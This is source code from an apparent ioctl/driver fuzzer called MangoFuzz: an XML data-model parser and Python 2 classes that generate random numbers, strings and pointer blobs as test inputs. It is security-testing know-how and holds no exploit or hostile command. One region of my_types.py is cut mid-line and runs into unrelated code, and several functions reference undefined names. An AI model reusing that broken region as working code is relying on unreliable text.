blob_mappings[blob_id][offset] 66 | dst_idx = id_idx[dst_id] 67 | entry = Mapping(dst_id, src_id, src_idx, dst_idx, offset) 68 | map_arr.append(entry) 69 | 70 | return blob_arr, map_arr 71 | -------------------------------------------------------------------------------- /MangoFuzz/fuzzer/mango_types/mapping.py: -------------------------------------------------------------------------------- 1 | 2 | class Mapping(object): 3 | def __init__(self, blob_id, src_id, src_idx, dst_idx, offset): 4 | self.src_id = src_id 5 | self.blob_id = blob_id 6 | self.src_idx = src_idx 7 | self.dst_idx = dst_idx 8 | self.offset = offset 9 | 10 | def show(self): 11 | print "Src idx:", self.src_idx 12 | print "Dst idx:", self.dst_idx 13 | print "Offset:", self.offset 14 | print "Src id: " + self.src_id 15 | print "Dst id: " + self.blob_id 16 | -------------------------------------------------------------------------------- /MangoFuzz/fuzzer/mango_types/my_types.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import struct 3 | import string 4 | import xml.etree.ElementTree as ET 5 | import ipdb 6 | 7 | # TODO: import engine.. 8 | import random 9 | random.seed(7) 10 | 11 | def error(msg): 12 | print msg 13 | ipdb.set_trace() 14 | sys.exit(1) 15 | 16 | class JPit(): 17 | def __init__(self, name): 18 | self.name = name 19 | self.dms = [] 20 | 21 | def __getitem__(self, idx): 22 | return self.dms[idx] 23 | 24 | def __len__(self): 25 | return len(self.dms) 26 | 27 | def findDataModel(self, dm_name): 28 | for dm in self.dms: 29 | if dm.name == dm_name: 30 | return dm 31 | return None 32 | 33 | def addChild(self, dm): 34 | if isinstance(dm, DataModel): 35 | self.dms.append(dm) 36 | dm.parent = self 37 | else: 38 | error("Trying to add a non DataModel to a JPit") 39 | 40 | class DataModel(): 41 | def __init__(self, name, size, etree, etree_dm): 42 | self.name = name 43 | # DataElements that makeup the DataModel 44 | self.elements = [] 45 | # size in bytes 46 | self.size = size 47 | # the etree 48 | self.etree = etree 49 | # the etree elem 50 | self.etree_dm = etree_dm 51 | 52 | self.parent = None 53 | 54 | def __getitem__(self, idx): 55 | return self.elements[idx] 56 | 57 | def __len__(self): 58 | return len(self.elements) 59 | 60 | def copy(self, visited=None): 61 | if visited is None: 62 | visited = [] 63 | 64 | visited.append(self) 65 | new_data_model = DataModel(self.name, self.size, self.etree, self.etree_dm) 66 | new_data_model.parent = self.parent 67 | 68 | for element in self.elements: 69 | new_data_model.addChild(element.copy(visited)) 70 | 71 | visited.remove(self) 72 | return new_data_model 73 | 74 | def getRoot(self): 75 | return self.etree.getroot() 76 | 77 | def addChild(self, data_element): 78 | if isinstance(data_element, DataElement): 79 | self.elements.append(data_element) 80 | data_element.parent = self 81 | else: 82 | error("Trying to add a non data_element to a DataModel") 83 | 84 | def generate(self): 85 | our_data = '' 86 | our_blobs = {} 87 | our_mappings = {} 88 | additional_mappings = {} 89 | for element in self: 90 | ele_data, ele_blobs, ele_mappings, ele_blob_mappings = element.generate() 91 | # element offset within the dm 92 | ele_offset = len(our_data) 93 | # add the data 94 | our_data += ele_data 95 | # update our_blobs with the element blobs 96 | our_blobs.update(ele_blobs) 97 | if len(ele_mappings) > 0: 98 | for ele_data_offset in ele_mappings: 99 | our_mappings[ele_offset + ele_data_offset] = ele_mappings[ele_data_offset] 100 | 101 | # add the ele_blob_mappings to our additional mappings 102 | additional_mappings.update(ele_blob_mappings) 103 | 104 | return our_data, our_blobs, our_mappings, additional_mappings 105 | 106 | 107 | def getValue(self): 108 | cur_data = '' 109 | for e in self.elements: 110 | cur_data += e.demandValue() 111 | return cur_data 112 | 113 | 114 | class DataElement(): 115 | def __init__(self, name, parent=None): 116 | self.name = name 117 | self.parent = parent 118 | self.value = None 119 | 120 | self.mutable = True 121 | self.occurs = 1 122 | self.minOccurs = 1 123 | self.maxOccurs = 1 124 | self.children = [] 125 | 126 | def __getitem__(self, idx): 127 | return self.children[idx] 128 | 129 | def __len__(self): 130 | return len(self.children) 131 | 132 | def copy(self): 133 | raise Exception("Copy not implemented for this class") 134 | 135 | def generate(self): 136 | raise Exception("Generate not implemented for this class") 137 | 138 | def getDataModel(self): 139 | parent = self.parent 140 | while (isinstance(parent, DataModel) == False): 141 | parent = parent.parent 142 | 143 | return parent 144 | 145 | def addChild(self, child_node): 146 | if child_node is None: 147 | error("Trying to append an empty child!") 148 | 149 | # set the childs parent 150 | child_node.parent = self 151 | # add it to our children array 152 | self.children.append(child_node) 153 | 154 | def getValue(self): 155 | return self.value 156 | 157 | def demandValue(self): 158 | if self.value is None: 159 | val = self.generate() 160 | return val 161 | else: 162 | return self.value 163 | 164 | def getSizeBytes(self): 165 | raise Exception("Class has no implementation of getSizeBytes()") 166 | 167 | 168 | class Block(DataElement): 169 | def __init__(self, name, parent=None, ref=None, occurs=1): 170 | DataElement.__init__(self, name, parent) 171 | self.data_type = "Block" 172 | # is this a reference to another DM? 173 | self.ref = ref 174 | if ref is None: 175 | self.is_ref = False 176 | else: 177 | self.is_ref = True 178 | self.ref.parent = self 179 | 180 | self.occurs = occurs 181 | if occurs > 1: 182 | self.is_array = True 183 | else: 184 | self.is_array = False 185 | 186 | def copy(self, visited=None): 187 | if visited is None: 188 | visited = [] 189 | visited.append(self) 190 | new_block = Block(self.name, self.parent, self.ref, self.occurs) 191 | 192 | for child in self: 193 | new_block.addChild(child.copy(visited)) 194 | 195 | visited.remove(self) 196 | return new_block 197 | 198 | def generate(self): 199 | # target_data, additional_blobs, target_mappings, child_mappings 200 | our_data = '' 201 | to_ret_blobs = {} 202 | our_mappings = {} 203 | additional_mappings = {} 204 | 205 | # if we're a ref, call generate() on whatever DM we're a ref to 206 | if self.is_ref: 207 | #target_data, additional_blobs, target_mappings, child_mappings = self.ref.generate() 208 | return self.ref.generate() 209 | 210 | for child in self: 211 | child_data, child_additional_blobs, child_data_mappings, child_blob_mappings = child.generate() 212 | # get the child offset in our data 213 | child_offset = len(our_data) 214 | # add the child data to our data 215 | our_data += child_data 216 | # get a blob id for the child data 217 | child_blob_id = child.name + '_' + str(id(child)) 218 | # update to_ret_blobs with any additional child_blobs 219 | to_ret_blobs.update(child_additional_blobs) 220 | if len(child_data_mappings) > 0: 221 | for child_mapping_offset in child_data_mappings: 222 | our_mappings[child_offset+child_mapping_offset] = child_data_mappings[child_mapping_offset] 223 | 224 | # add the childs blob mappings to our additional mappings 225 | additional_mappings.update(child_blob_mappings) 226 | 227 | return our_data, to_ret_blobs, our_mappings, additional_mappings 228 | 229 | def getSizeBytes(self): 230 | if self.is_ref: 231 | return self.ref.size 232 | else: 233 | size = 0 234 | for child in self: 235 | size += child.getSizeBytes() 236 | return size 237 | 238 | class String(DataElement): 239 | def __init__(self, name, length, parent=None): 240 | DataElement.__init__(self, name, parent) 241 | self.data_type = "String" 242 | # length in bytes 243 | self.length = length 244 | 245 | def copy(self, visited=None): 246 | new_string = String(self.name, self.length, self.parent) 247 | new_string.data_type = "String" 248 | return new_string 249 | 250 | def generate(self): 251 | val = '' 252 | for x in range(self.length): 253 | val += chr(random.randint(0, 0xff)) 254 | self.value = val 255 | 256 | # target_data, additional_blobs, target_mappings, child_mappings 257 | return val, {}, {}, {} 258 | 259 | def getSizeBytes(self): 260 | return self.length 261 | 262 | 263 | class Number(DataElement): 264 | def __init__(self, name, size, parent=None): 265 | DataElement.__init__(self, name, parent) 266 | self.data_type = "Number" 267 | # size in bits 268 | if size%8 != 0: 269 | error("Odd sized number: %s %s" % (name, size)) 270 | 271 | self.bit_size = size 272 | self.has_default_val = False 273 | self.default_val = None 274 | self.signed = False 275 | 276 | # preset vals 277 | self.small_sizes = [1,8,16,32,64,128,512,1024,7,15,31,63,127,511,1012] 278 | self.tiny_sizes = [1,8,16,32,64,128,255,7,15,63,127] 279 | 280 | # fmts 281 | self.pack_formats = {8:'B', 16:'H', 32:'I', 64:'Q'} 282 | 283 | 284 | def copy(self, visited=None): 285 | new_number = Number(self.name, self.bit_size, self.parent) 286 | new_number.data_type = "Number" 287 | new_number.has_default_val = self.has_default_val 288 | new_number.default_val = self.default_val 289 | return new_number 290 | 291 | def generate(self): 292 | # If there's a default value from the jpit, return that 293 | if self.default_val is not None: 294 | val = self.default_val 295 | 296 | else: 297 | # reset signed to False 298 | self.signed = False 299 | chance = random.random() 300 | # 5% chance to be 0 301 | if chance < 0.05: 302 | self.value = 0 303 | val = 0 304 | 305 | # 5% chance to be -1 306 | elif chance < 0.10: 307 | self.value = -1 308 | self.signed = True 309 | val = -1 310 | 311 | # 30% chance to be a "small" number 312 | elif chance < 0.40: 313 | if self.bit_size == 8: 314 | val = random.choice(self.tiny_sizes) 315 | else: 316 | val = random.choice(self.small_sizes) 317 | self.value = val 318 | 319 | # 60% chance most likely a big ass number 320 | else: 321 | val = random.randint(0, 2**self.bit_size-1) 322 | self.value = val 323 | 324 | # pack the data 325 | fmt = self.pack_formats[self.bit_size] 326 | if self.signed: 327 | fmt = string.lower(fmt) 328 | 329 | # TODO: add big endian support 330 | # little endian by default 331 | fmt = '<' + fmt 332 | try: 333 | val = struct.pack(fmt, val) 334 | except: 335 | print fmt 336 | print val 337 | import ipdb;ipdb.set_trace() 338 | 339 | # target_data, additional_blobs, target_mappings, child_mappings 340 | return val, {}, {}, {} 341 | 342 | def getSizeBytes(self): 343 | size_bytes = self.bit_size/8 344 | return size_bytes 345 | 346 | def setDefaultValue(self, value): 347 | self.default_value = value 348 | self.value = value 349 | self.has_default_val = True 350 | 351 | 352 | class Choice(DataElement): 353 | def __init__(self, name, num_choices, choice_type, parent=None): 354 | DataElement.__init__(self, name, parent) 355 | self.data_type = "Choice" 356 | # Number of choices 357 | self.num_choices = num_choices 358 | # enum or union 359 | self.choice_type = choice_type 360 | 361 | def copy(self, visited=None): 362 | if visited is None: 363 | visited = [] 364 | visited.append(self) 365 | new_choice = Choice(self.name, self.num_choices, self.choice_type, self.parent) 366 | new_choice.data_type = "Choice" 367 | 368 | for thing in self: 369 | new_choice.addChild(thing.copy(visited)) 370 | visited.remove(self) 371 | return new_choice 372 | 373 | def getSizeBytes(self): 374 | some_choice = self.children[0] 375 | return some_choice.getSizeBytes() 376 | 377 | 378 | class Enum(Choice): 379 | def __init__(self, name, num_choices, choice_type, parent=None): 380 | Choice.__init__(self, name, num_choices, choice_type, parent) 381 | self.data_type = "Enum" 382 | 383 | # all enum choices should have default vals 384 | def generate(self): 385 | # 5% chance to be something other than one of the predefined vals 386 | if random.random() < 0.05: 387 | size = self[0][0].bit_size 388 | val = random.randint(0, 2**size-1) 389 | 390 | else: 391 | val = random.choice(self)[0].default_value 392 | 393 | self.value = val 394 | if val < 1: 395 | fmt = " 0: 488 | additional_mappings[resolved_blob_id] = resolved_mappings 489 | 490 | additional_mappings.update(resolved_additional_mappings) 491 | 492 | return our_data, to_ret_blobs, our_mappings, additional_mappings 493 | 494 | def getSizeBytes(self): 495 | return self.length 496 | 497 | 498 | -------------------------------------------------------------------------------- /MangoFuzz/fuzzer/mango_types/number.py: -------------------------------------------------------------------------------- 1 | from data_guys import DataElement 2 | from ..utils import rotten_peel 3 | import random 4 | import string 5 | import struct 6 | 7 | class Number(DataElement): 8 | def __init__(self, name, size, engine, parent=None): 9 | DataElement.__init__(self, name, engine, parent) 10 | self.data_type = "Number" 11 | # size in bits 12 | if size%8 != 0: 13 | rotten_peel("Odd sized number: %s %s",name, size) 14 | 15 | self.bit_size = size 16 | self.has_default_val = False 17 | self.default_val = None 18 | self.signed = False 19 | 20 | # preset vals 21 | self.small_sizes = [1,8,16,32,64,128,512,1024,7,15,31,63,127,511,1012] 22 | self.tiny_sizes = [1,8,16,32,64,128,255,7,15,63,127] 23 | 24 | # fmts 25 | self.pack_formats = {8:'B', 16:'H', 32:'I', 64:'Q'} 26 | 27 | def copy(self, visited=None): 28 | new_number = Number(self.name, self.bit_size, self.engine, self.parent) 29 | new_number.data_type = "Number" 30 | new_number.has_default_val = self.has_default_val 31 | new_number.default_val = self.default_val 32 | return new_number 33 | 34 | def generate_old(self): 35 | # If there's a default value from the jpit, use that 36 | if self.default_val is not None: 37 | val = self.default_val 38 | 39 | else: 40 | # reset signed to False 41 | self.signed = False 42 | chance = random.random() 43 | # 5% chance to be 0 44 | if chance < 0.05: 45 | self.value = 0 46 | val = 0 47 | 48 | # 5% chance to be -1 49 | elif chance < 0.10: 50 | self.value = -1 51 | self.signed = True 52 | val = -1 53 | 54 | # 30% chance to be a "small" number 55 | elif chance < 0.40: 56 | if self.bit_size == 8: 57 | val = random.choice(self.tiny_sizes) 58 | else: 59 | val = random.choice(self.small_sizes) 60 | self.value = val 61 | 62 | # 60% chance most likely a big ass number 63 | else: 64 | val = random.randint(0, 2**self.bit_size-1) 65 | self.value = val 66 | 67 | # pack the data 68 | fmt = self.pack_formats[self.bit_size] 69 | if self.signed: 70 | fmt = string.lower(fmt) 71 | 72 | # TODO: add big endian support 73 | # little endian by default 74 | fmt = '<' + fmt 75 | try: 76 | val = struct.pack(fmt, val) 77 | except: 78 | print fmt 79 | print val 80 | import ipdb;ipdb.set_trace() 81 | 82 | # target_data, additional_blobs, target_mappings, child_mappings 83 | return val, {}, {}, {} 84 | 85 | def generate(self): 86 | # If there's a default value from the jpit, use that 87 | if self.default_val is not None: 88 | val = self.default_val 89 | 90 | else: 91 | matching_blenders = self.engine.blender_factory.getMatchingBlenders(self.data_type) 92 | if len(matching_blenders) == 0: 93 | rotten_peel("No blenders available for data type: %s", self.data_type) 94 | 95 | blender_pick = random.choice(matching_blenders) 96 | val = blender_pick.blend(self.value, self.bit_size) 97 | 98 | # update our value 99 | self.value = val 100 | # pack the data 101 | fmt = self.pack_formats[self.bit_size] 102 | # signed 103 | if val < 0: 104 | fmt = string.lower(fmt) 105 | 106 | # TODO: add big endian support 107 | # little endian by default 108 | fmt = '<' + fmt 109 | try: 110 | val = struct.pack(fmt, val) 111 | except: 112 | print fmt 113 | print val 114 | import ipdb;ipdb.set_trace() 115 | 116 | # target_data, additional_blobs, target_mappings, child_mappings 117 | self.value = val 118 | return val, {}, {}, {} 119 | 120 | def blend(self): 121 | target_data = None 122 | # get all available blenders. 123 | all_available_blenders = self.blender_factory.getMatchingBlenders(self.data_type) 124 | if len(all_available_blenders) == 0: 125 | rotten_peel("No blenders available for data type: %s", self.data_type) 126 | else: 127 | # pick a random blender. 128 | blender_pick = self.engine_obj.getRandomPick(all_available_blenders) 129 | # get the blender value 130 | target_data = blender_pick.blend(self.value, self.bit_size/8) 131 | # assign old data. 132 | self.value = target_data 133 | 134 | return target_data, {}, {}, {} 135 | 136 | def getSizeBytes(self): 137 | size_bytes = self.bit_size/8 138 | return size_bytes 139 | 140 | def setDefaultValue(self, value): 141 | self.default_val = value 142 | self.value = value 143 | self.has_default_val = True 144 | 145 | -------------------------------------------------------------------------------- /MangoFuzz/fuzzer/mango_types/pointer.py: -------------------------------------------------------------------------------- 1 | from data_guys import DataElement 2 | import random 3 | 4 | class Pointer(DataElement): 5 | 6 | def __init__(self, name, ptr_to, ptr_depth, length, engine, parent=None): 7 | DataElement.__init__(self, name, engine, parent) 8 | self.name = name 9 | self.ptr_to = ptr_to 10 | if ptr_to in ['Number', 'String']: 11 | self.is_generic_ptr = True 12 | else: 13 | self.is_generic_ptr = False 14 | self.ptr_depth = ptr_depth 15 | self.length = length 16 | self.resolved = None 17 | self.is_recursive = False 18 | 19 | self.ptr_type = None 20 | self.elem_size = None 21 | 22 | def copy(self, visited=None): 23 | if visited is None: 24 | visited = [] 25 | 26 | new_pointer = Pointer(self.name, self.ptr_to, self.ptr_depth, self.length, self.engine, self.parent) 27 | new_pointer.is_recursive = self.is_recursive 28 | new_pointer.ptr_type = self.ptr_type 29 | new_pointer.elem_size = self.elem_size 30 | 31 | if self in visited: 32 | new_pointer.is_recursive = True 33 | return new_pointer 34 | 35 | visited.append(self) 36 | if self.resolved is not None: 37 | new_pointer.resolved = self.resolved.copy(visited) 38 | visited.remove(self) 39 | return new_pointer 40 | 41 | def generate(self): 42 | our_data = '' 43 | our_mappings = {} 44 | to_ret_blobs = {} 45 | additional_mappings = {} 46 | ''' 47 | for x in range(self.length): 48 | our_data += chr(random.randint(0, 0xff)) 49 | ''' 50 | # easy to spot 51 | our_data = "A"*self.length 52 | self.value = our_data 53 | 54 | # Check if we're recursive. If so, don't generate 55 | if self.is_recursive: 56 | our_data = "\x00"*self.length 57 | self.value = our_data 58 | return our_data, {}, {}, {} 59 | 60 | # Check if we're a generic ptr, if so, generate some generic data.. 61 | if self.is_generic_ptr: 62 | matching_blenders = self.engine.blender_factory.getMatchingBlenders("Blob") 63 | if len(matching_blenders) == 0: 64 | rotten_peel("No matching blenders for type Blob!") 65 | blender_pick = random.choice(matching_blenders) 66 | data = blender_pick.blend(self.value, self.ptr_type, self.elem_size) 67 | data_id = self.name + '_' + str(id(self)) 68 | our_mappings[0] = data_id 69 | to_ret_blobs[data_id] = data 70 | 71 | # complex ptr 72 | else: 73 | # Okay, we have our actual field data, now call generate() on self.resolved 74 | # this will be additional_blob(s) and the mappings will go in target_mappings 75 | if self.resolved is None: 76 | error("Trying to generate a non resolved pointer!") 77 | 78 | ptr_to = self.resolved.name 79 | resolved_data, resolved_additional_blobs, resolved_mappings, resolved_additional_mappings = self.resolved.generate() 80 | 81 | # store the resolved data into our to_ret_blobs 82 | resolved_blob_id = ptr_to + '_' + str(id(self.resolved)) 83 | to_ret_blobs[resolved_blob_id] = resolved_data 84 | 85 | # update to_ret_blobs with any additional blobs we got from the resolve 86 | to_ret_blobs.update(resolved_additional_blobs) 87 | 88 | # With respect to us, the resolved data is at offset 0 89 | our_mappings[0] = resolved_blob_id 90 | 91 | if len(resolved_mappings) > 0: 92 | additional_mappings[resolved_blob_id] = resolved_mappings 93 | 94 | additional_mappings.update(resolved_additional_mappings) 95 | 96 | return our_data, to_ret_blobs, our_mappings, additional_mappings 97 | 98 | def blend(self): 99 | # random string 100 | target_data = self.engine_obj.getRandomString(self.length) 101 | # here get the required blobs 102 | assert self.resolved is not None, "Pointer should be of certain type" 103 | # Now blend the resolved type 104 | dst_data, dst_blobs, dst_data_mappings, dst_blob_mappings = self.resolved.blend() 105 | 106 | # generate random id for the blob 107 | blob_id = self.engine_obj.getRandomString(5) 108 | to_ret_blobs = {} 109 | # sanity, ensure that each blob has different ids. 110 | assert blob_id not in dst_blobs 111 | # Add the data of the resolved element into blobs 112 | to_ret_blobs[blob_id] = dst_data 113 | curr_data_mappings = dict() 114 | # Now add the mapping so that the blob is at offset 0 115 | curr_data_mappings[0] = blob_id 116 | 117 | # OK. Now add all dst_blobs to ret blobs 118 | to_ret_blobs.update(dst_blobs) 119 | # Add all mappings 120 | to_ret_blob_mappings = dict() 121 | to_ret_blob_mappings[blob_id] = dst_data_mappings 122 | to_ret_blob_mappings.update(dst_blob_mappings) 123 | 124 | return target_data, to_ret_blobs, curr_data_mappings, to_ret_blob_mappings 125 | 126 | def getSizeBytes(self): 127 | return self.length 128 | 129 | 130 | -------------------------------------------------------------------------------- /MangoFuzz/fuzzer/mango_types/strings.py: -------------------------------------------------------------------------------- 1 | from data_guys import DataElement 2 | from ..utils import rotten_peel 3 | import random 4 | 5 | class String(DataElement): 6 | 7 | def __init__(self, name, length, engine, parent=None): 8 | DataElement.__init__(self, name, engine, parent) 9 | self.data_type = "String" 10 | # length in bytes 11 | self.length = length 12 | 13 | def copy(self, visited=None): 14 | new_string = String(self.name, self.length, self.engine, self.parent) 15 | new_string.data_type = "String" 16 | return new_string 17 | 18 | def generate_old(self): 19 | val = '' 20 | for x in range(self.length): 21 | val += chr(random.randint(0, 0xff)) 22 | self.value = val 23 | 24 | # target_data, additional_blobs, target_mappings, child_mappings 25 | return val, {}, {}, {} 26 | 27 | def generate(self): 28 | # get string blenders 29 | matching_blenders = self.engine.blender_factory.getMatchingBlenders(self.data_type) 30 | if len(matching_blenders) == 0: 31 | rotten_peel("No blenders available for data type: %s", self.data_type) 32 | # randomly choose one 33 | blender_pick = random.choice(matching_blenders) 34 | val = blender_pick.blend(self.value, self.length) 35 | self.value = val 36 | 37 | # target_data, additional_blobs, target_mappings, child_mappings 38 | self.value = val 39 | return val, {}, {}, {} 40 | 41 | def blend(self): 42 | target_data = None 43 | # get all available blenders. 44 | all_available_blenders = self.blender_factory.getMatchingBlenders(self.data_type) 45 | if len(all_available_blenders) == 0: 46 | rotten_peel("No blenders available for data type: %s", self.data_type) 47 | else: 48 | # pick a random blender. 49 | blender_pick = self.engine_obj.getRandomPick(all_available_blenders) 50 | # get the blender value 51 | target_data = blender_pick.blend(self.value, self.length) 52 | # assign old data. 53 | self.value = target_data 54 | 55 | return target_data, {}, {}, {} 56 | 57 | def getSizeBytes(self): 58 | return self.length 59 | 60 | -------------------------------------------------------------------------------- /MangoFuzz/fuzzer/parse.py: -------------------------------------------------------------------------------- 1 | import xml.etree.ElementTree as ET 2 | #from my_types import * 3 | from mango_types import * 4 | import juicers 5 | from utils import * 6 | 7 | class Parser(): 8 | def __init__(self, engine): 9 | self.engine = engine 10 | self.pit_file = None 11 | self.main_struct = None 12 | self.last_parsed = None 13 | self.cur_parsing = None 14 | self.parsed_dms = [] 15 | # will need to call copy() on these 16 | # once the parsing of the DM is done 17 | self.recursive_resolves = [] 18 | self.jspec = None 19 | self.jspec_tree = None 20 | 21 | def lookupRef(self, ref_to): 22 | resolved_ref = None 23 | for dm in self.parsed_dms: 24 | if dm.name == ref_to: 25 | resolved_ref = dm 26 | 27 | if resolved_ref is None: 28 | # recursive reference 29 | if ref_to == self.cur_parsing.name: 30 | return self.cur_parsing 31 | # Couldn't find it 32 | else: 33 | rotten_peel("Couldn't find reference to: %s", ref_to) 34 | else: 35 | return resolved_ref 36 | 37 | 38 | def HandleNumber(self, num_node, parent): 39 | name = num_node.get('name') 40 | size = int(num_node.get('size')) 41 | value = num_node.get('value') 42 | 43 | number = Number(name, size, self.engine) 44 | if value is not None: 45 | value = int(value) 46 | number.setDefaultValue(value) 47 | if value < 0: 48 | number.signed = True 49 | 50 | return number 51 | 52 | def HandleString(self, num_node, parent): 53 | name = num_node.get('name') 54 | length = int(num_node.get('length')) 55 | 56 | my_string = String(name, length, self.engine) 57 | return my_string 58 | 59 | 60 | def HandleBlock(self, block_node, parent): 61 | name = block_node.get('name') 62 | ref = block_node.get('ref') 63 | 64 | if ref is not None: 65 | resolved_ref = self.lookupRef(ref).copy() 66 | else: 67 | resolved_ref = None 68 | 69 | # array 70 | minOccurs = block_node.get('minOccurs') 71 | maxOccurs = block_node.get('maxOccurs') 72 | 73 | occurs = 1 74 | if minOccurs is not None: 75 | occurs = minOccurs 76 | 77 | block = Block(name, self.engine, parent, resolved_ref, occurs) 78 | 79 | # if this block contains children 80 | children = block_node.getchildren() 81 | # if we're an array 82 | if occurs > 1: 83 | for x in range(int(occurs)): 84 | for child in children: 85 | child_copy = child.copy() 86 | child_copy.set('name', child.get('name')+'_'+str(x)) 87 | self.ParseElement(child_copy, block) 88 | 89 | else: 90 | for child in children: 91 | self.ParseElement(child, block) 92 | 93 | return block 94 | 95 | def HandleChoice(self, choice_node, parent): 96 | name = choice_node.get('name') 97 | choice_type = choice_node.get('choice_type') 98 | num_choices = len(choice_node) 99 | 100 | if choice_type == 'union': 101 | choice = Union(name, num_choices, choice_type, self.engine) 102 | elif choice_type == 'enum': 103 | choice = Enum(name, num_choices, choice_type, self.engine) 104 | else: 105 | rotten_peel("Unknown choice type: %s", choice_type) 106 | 107 | # handle children 108 | children = choice_node.getchildren() 109 | for child in children: 110 | self.ParseElement(child, choice) 111 | 112 | return choice 113 | 114 | def HandlePointer(self, pointer_node, parent): 115 | name = pointer_node.get('name') 116 | ptr_to = pointer_node.get('ptr_to') 117 | ptr_depth = pointer_node.get('ptr_depth') 118 | length = int(pointer_node.get('length')) 119 | 120 | pointer = Pointer(name, ptr_to, ptr_depth, length, self.engine, parent) 121 | 122 | # TODO: Keep this consistent with Block refs (ref/resolved parent setting) 123 | 124 | # generic pointer. Nothing to generate 125 | if pointer.is_generic_ptr: 126 | pointer.ptr_type = pointer_node.get('base') 127 | pointer.elem_size = pointer_node.get('elem_size') 128 | 129 | # complex pointer (should point to a dm) 130 | # Fuuuuuck. Pointers to unions. I don't handle this in generation. 131 | else: 132 | # Check if recursive 133 | if self.cur_parsing.name == ptr_to: 134 | # don't call copy(). This will be done for us after parsing the DM 135 | # we wait to do this because the DM is still being parsed 136 | resolved_dm = self.lookupRef(ptr_to) 137 | pointer.resolved = resolved_dm 138 | self.recursive_resolves.append(pointer) 139 | else: 140 | # make a copy of the resolved DM so we have a separate obj 141 | resolved_dm_instance = self.lookupRef(ptr_to).copy() 142 | resolved_dm_instance.parent = pointer 143 | pointer.resolved = resolved_dm_instance 144 | 145 | return pointer 146 | 147 | def ParseElement(self, node_to_parse, parent): 148 | name = node_to_parse.get('name') 149 | tag = node_to_parse.tag 150 | new_elem = None 151 | 152 | if tag == 'Number': 153 | new_elem = self.HandleNumber(node_to_parse, parent) 154 | elif tag == 'String': 155 | new_elem = self.HandleString(node_to_parse, parent) 156 | elif tag == 'Block': 157 | new_elem = self.HandleBlock(node_to_parse, parent) 158 | elif tag == 'Choice': 159 | new_elem = self.HandleChoice(node_to_parse, parent) 160 | elif tag == 'Pointer': 161 | new_elem = self.HandlePointer(node_to_parse, parent) 162 | else: 163 | rotten_peel("Unknown tag while parsing: %s", tag) 164 | 165 | # adds child and sets parent 166 | parent.addChild(new_elem) 167 | return new_elem 168 | 169 | # parses an xml dm and instantiates a DataModel dom object 170 | def ParseDataModel(self, dm, tree): 171 | name = dm.get('name') 172 | size = int(dm.get('byte_size')) 173 | # Our DataModel 174 | our_data_model = DataModel(name, size, tree, dm, self.engine) 175 | self.cur_parsing = our_data_model 176 | 177 | # go through all the contained elementes and instantiate them 178 | for child in dm: 179 | # will add the children to our_data_model 180 | our_data_element = self.ParseElement(child, our_data_model) 181 | 182 | self.parsed_dms.append(our_data_model) 183 | return our_data_model 184 | 185 | def parse_config(self, root, jpit): 186 | config_elem = root.find('Config') 187 | if config_elem is None: 188 | rotten_peel("Config element not found in pit!") 189 | 190 | # devname 191 | devname_ele = config_elem.find('devname') 192 | if devname_ele is None: 193 | rotten_peel("devname element not found in config!") 194 | devname = devname_ele.get('value') 195 | jpit.devname = devname 196 | 197 | # ioctl_id 198 | ioctl_id_ele = config_elem.find('ioctl_id') 199 | if ioctl_id_ele is None: 200 | rotten_peel("ioctl_id element not found in config!") 201 | ioctl_id = ioctl_id_ele.get('value') 202 | jpit.ioctl_id = ioctl_id 203 | 204 | # target struct 205 | target_struct_ele = config_elem.find('target_struct') 206 | if target_struct_ele is None: 207 | rotten_peel("target_struct element not found in config!") 208 | target_struct = target_struct_ele.get('value') 209 | jpit.target_struct = target_struct 210 | 211 | 212 | # parses a jpit and returns 213 | def Parse(self, fname): 214 | try: 215 | tree = ET.parse(fname) 216 | except ET.ParseError: 217 | rotten_peel("Failed to parse file: %s", fname) 218 | 219 | self.last_parsed = tree 220 | # reset the parsed_dms 221 | self.parsed_dms = [] 222 | root = tree.getroot() 223 | 224 | # create our jpit 225 | jpit = JPit(fname) 226 | 227 | # parse the config info (devname, ioctl_id, target_struct) 228 | self.parse_config(root, jpit) 229 | 230 | data_models = [] 231 | for child in root: 232 | if child.tag == 'DataModel': 233 | data_models.append(child) 234 | 235 | my_dms = [] 236 | for dm in data_models: 237 | parsed_dm = self.ParseDataModel(dm, tree) 238 | my_dms.append(parsed_dm) 239 | 240 | # fixup recursive resolves now that the DM is complete 241 | for ptr_ele in self.recursive_resolves: 242 | ptr_ele.resolved = ptr_ele.resolved.copy() 243 | ptr_ele.resolved.parent = ptr_ele 244 | 245 | self.recursive_resolves = [] 246 | self.cur_parsing = None 247 | 248 | for dm in my_dms: 249 | jpit.addChild(dm) 250 | 251 | # append the jpit to our engine 252 | self.engine.addPit(jpit) 253 | return jpit 254 | 255 | def ParseJspec(self, fname): 256 | supported_jtypes = juicers.getSupportedJtypes() 257 | 258 | self.jspec = fname 259 | tree = ET.parse(fname) 260 | self.jspec_tree = tree 261 | root = tree.getroot() 262 | juicer_elem = root.find('juicer') 263 | if juicer_elem is None: 264 | rotten_peel("Invalid jspec supplied. Couldn't find juicer element!") 265 | 266 | jtype = juicer_elem.get('type') 267 | if jtype not in supported_jtypes: 268 | rotten_peel("juicer type %s is not supported!", jtype) 269 | 270 | parser = juicer.getParser(jtype) 271 | juicer = parser(tree) 272 | 273 | -------------------------------------------------------------------------------- /MangoFuzz/fuzzer/utils/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | Utils guy 3 | """ 4 | from peelers import * 5 | import binascii 6 | 7 | 8 | def int2bytes(i): 9 | """ 10 | 11 | :param i: 12 | :return: 13 | """ 14 | hex_string = '%x' % i 15 | n = len(hex_string) 16 | return binascii.unhexlify(hex_string.zfill(n + (n & 1))) 17 | -------------------------------------------------------------------------------- /MangoFuzz/fuzzer/utils/peelers.py: -------------------------------------------------------------------------------- 1 | def normal_peel(fmt, *args): 2 | """ 3 | logs info 4 | :param fmt: format string 5 | :param args: arguments. 6 | :return: None 7 | """ 8 | print("[*] " + fmt % args) 9 | 10 | 11 | def thick_peel(fmt, *args): 12 | """ 13 | logs debug 14 | :param fmt: format string 15 | :param args: arguments. 16 | :return: None 17 | """ 18 | print("[$] " + fmt % args) 19 | 20 | 21 | def juicy_peel(fmt, *args): 22 | """ 23 | logs success 24 | :param fmt: format string 25 | :param args: arguments. 26 | :return: None 27 | """ 28 | print("[+] " + fmt % args) 29 | 30 | 31 | def raw_peel(fmt, *args): 32 | """ 33 | logs warning 34 | :param fmt: format string 35 | :param args: arguments. 36 | :return: None 37 | """ 38 | print("[!] " + fmt % args) 39 | 40 | 41 | def rotten_peel(fmt, *args): 42 | """ 43 | logs error 44 | :param fmt: format string 45 | :param args: arguments. 